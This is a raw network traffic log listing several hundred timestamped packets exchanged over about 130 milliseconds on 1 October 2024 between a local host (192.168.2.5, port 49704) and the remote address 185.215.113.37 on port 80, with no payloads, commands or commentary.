Oct 1, 2024 16:50:07.874901056 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.874912977 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.874924898 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.874938011 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.874948025 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.874958038 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.874959946 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.874979019 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.875066996 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.875761032 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.875797987 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.875808954 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.875814915 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.875845909 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.875863075 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.875864983 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.875874043 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.875884056 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.875914097 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.875914097 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.876305103 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.876316071 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.876326084 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.876369953 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.876369953 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.876370907 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.876383066 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.876391888 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.876403093 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.876426935 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.876462936 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.876462936 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.877597094 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.877648115 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.877660036 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.877675056 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.877687931 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.877701044 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.877712011 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.877717972 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.877722979 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.877733946 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.877742052 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.877768993 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.877770901 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.877782106 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.877793074 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.877798080 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.877805948 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.877815962 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.877825022 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.877825022 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.877837896 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.877865076 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.877865076 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.877892971 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.878642082 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.878653049 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.878663063 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.878694057 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.878701925 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.878714085 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.878724098 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.878734112 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.878743887 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.878750086 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.878750086 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.878812075 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.878828049 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.878839016 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.878895044 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.878921986 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.878957033 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.878962994 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.878962994 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.878968954 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.878999949 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.879012108 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.879013062 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.879013062 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.879067898 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.879080057 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.879098892 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.879137993 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.879137993 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.879141092 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.879153013 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.879163027 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.879173994 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.879184961 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.879194975 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.879199982 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.879199982 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.879218102 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.879228115 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.879239082 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.879249096 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.879256010 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.879256010 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.879260063 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.879290104 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.879352093 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.879398108 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.879407883 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.879417896 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.879429102 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.879439116 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.879441977 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.879450083 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.879453897 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.879461050 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.879489899 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.879524946 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.917295933 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.917306900 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.917318106 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.917367935 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.917454004 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.917465925 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.917475939 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.917484999 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.917495966 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.917501926 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.917501926 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.917505980 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.917516947 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.917526960 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.917532921 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.917536974 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.917545080 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.917547941 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.917557955 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.917568922 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.917572021 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.917588949 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.917602062 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.917603970 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.917620897 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.917629957 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.917639971 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.917645931 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.917649031 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.917649031 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.917654991 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.917660952 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.917689085 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.917689085 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.917730093 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.917764902 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.917776108 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.917785883 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.917795897 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.917805910 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.917814970 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.917817116 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.917829037 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.917845011 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.917845011 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.917867899 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.917875051 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.917887926 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.917900085 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.917910099 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.917918921 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.917921066 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.917931080 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.917958021 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.917994022 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.918010950 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.918021917 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.918031931 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.918040991 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.918056011 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.918062925 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.918066978 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.918077946 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.918087959 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.918097973 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.918106079 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.918106079 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.918107033 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.918135881 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.918148041 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.963627100 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.963645935 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.963656902 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.963670015 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.963680983 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.963690996 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.963701963 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.963713884 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.963721991 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.963789940 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.964356899 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.964449883 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.964461088 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.964472055 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.964478970 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.964482069 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.964493036 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.964503050 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.964514017 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.964514971 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.964514017 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.964559078 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.964979887 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.964991093 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.965001106 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.965009928 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.965020895 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.965030909 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.965039968 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.965053082 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.965054035 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.965054035 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.965092897 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.965092897 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.966094971 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.966111898 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.966121912 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.966134071 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.966159105 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.966192007 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.966222048 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.966233015 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.966242075 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.966250896 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.966263056 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.966274977 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.966276884 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.966305017 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.966341972 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.966353893 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.966363907 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.966365099 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.966373920 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.966383934 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.966388941 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.966392994 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.966403961 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.966434002 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.966450930 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.967576027 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.967587948 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.967597961 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.967645884 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.967645884 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.967721939 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.967737913 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.967753887 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.967765093 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.967775106 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.967776060 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.967786074 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.967792034 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.967796087 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.967806101 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.967816114 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.967824936 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.967834949 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.967838049 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.967838049 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.967844963 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.967855930 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.967861891 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.967864990 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.967875004 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.967875004 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.967885017 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.967895031 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.967906952 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.967909098 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.967916965 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.967922926 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.967955112 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.967955112 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.968076944 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.968087912 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.968097925 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.968108892 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.968118906 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.968127012 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.968128920 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.968139887 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.968149900 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.968163013 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.968164921 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.968164921 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.968173027 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.968183041 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.968192101 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.968197107 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.968203068 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.968206882 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.968213081 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.968224049 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:07.968256950 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:07.968276024 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.006944895 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.006958008 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.006968975 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.006982088 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.006993055 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.007004023 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.007009029 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.007047892 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.007081032 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.007092953 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.007102966 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.007107973 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.007118940 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.007128954 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.007154942 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.007154942 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.007213116 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.007267952 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.007281065 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.007291079 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.007301092 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.007314920 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.007327080 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.007328033 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.007338047 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.007339001 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.007352114 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.007358074 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.007361889 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.007368088 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.007383108 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.007400990 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.007411957 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.007420063 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.007427931 CEST	49704	80	192.168.2.5	185.215.113.37
